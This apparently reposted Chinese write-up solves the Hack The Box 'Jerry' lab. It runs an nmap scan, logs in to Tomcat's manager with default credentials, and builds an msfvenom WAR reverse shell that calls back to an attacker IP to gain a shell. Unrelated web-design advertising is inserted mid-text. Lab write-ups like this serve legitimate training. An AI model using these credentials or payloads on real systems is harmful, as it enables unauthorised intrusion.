HTB的Jerry渗透测试是什么

本篇内容主要讲解“HTB的Jerry渗透测试是什么”，感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷，实用性强。下面就让小编来带大家学习“HTB的Jerry渗透测试是什么”吧!

本篇内容主要讲解“HTB的Jerry渗透测试是什么”，感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷，实用性强。下面就让小编来带大家学习“HTB的Jerry渗透测试是什么”吧!

基础信息
简介：Hack The Box是一个在线渗透测试平台。可以帮助你提升渗透测试技能和黑盒测试技能，平台环境都是模拟的真实环境，有助于自己更好的适应在真实环境的渗透
链接：https://www.hackthebox.eu/home/machines/profile/144

成都创新互联公司服务项目包括石狮网站建设、石狮网站制作、石狮网页制作以及石狮网络营销策划等。多年来，我们专注于互联网行业，利用自身积累的技术优势、行业经验、深度合作伙伴关系等，向广大中小型企业、政府机构等提供互联网行业的解决方案，石狮网站推广取得了明显的社会效益与经济效益。目前，我们服务的客户以成都为中心已经辐射到石狮省份的部分城市，未来相信会继续扩大服务区域并继续获得客户的支持与信任！

描述：

前言

本次演练使用kali系统按照渗透测试的过程进行操作，通过nmap发现端口开放了tomcat8080端口,使用密码登录tomcat，使用msfvenom 生成war文件上传到tomcat中，通过反弹获取shell。

一、信息收集1、靶机ip

IP地址为：10.10.10.95

2、靶机端口与服务nmap -sV -sS -T4 -O -A 10.10.10.95PORT     STATE SERVICE VERSION8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1|_http-server-header: Apache-Coyote/1.1|_http-title: Apache Tomcat/7.0.883、网站信息收集

查看8080端口

通过dirsearch进行目录扫描获取网站目录

这里我列出了部分需要的目录

/host-manager/html/manager/html/manager/二、漏洞探测与利用1、生成木马文件

进入/host-manager/html目录发现需要账号密码

点击取消后，再返回界面发现账号与密码
username="tomcat"
password="s3cret"

使用该密码进行登录，返回403页面无法正常进行登录

最后在/manager/目录下成功登录
发现可以上传war格式文件

使用msfvenom生成shell文件

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.2 LPORT=4444 -f war > shell.war2、使用msf获取shell

首先设置好msf，使用msf监听4444端口获取反弹的shell

在登陆页面上传war文件

上传成功后点击shell

成功获取到shell

三、提权

使用这种方式所获取的直接是authority权限可直接查看root.txt

进入 \Users\Administrator\Desktop目录发现没有root.txt但是存在flags
进入flags目录使用type命令查看2 for the price of 1.txt文件

获取到root.txt与user.txt

网站题目：HTB的Jerry渗透测试是什么
标题来源：https://www.cdcxhl.com/article6/iojoig.html

成都网站建设公司_创新互联，为您提供建站公司、响应式网站、用户体验、网站制作、云服务器、Google

广告

声明：本网站发布的内容（图片、视频和文字）以用户投稿、用户转载内容为主，如果涉及侵权请尽快告知，我们将会在第一时间删除。文章观点不代表本网站立场，如需处理请联系客服。电话：028-86922220；邮箱：631063699@qq.com。内容未经允许不得转载，或转载时需注明来源： 创新互联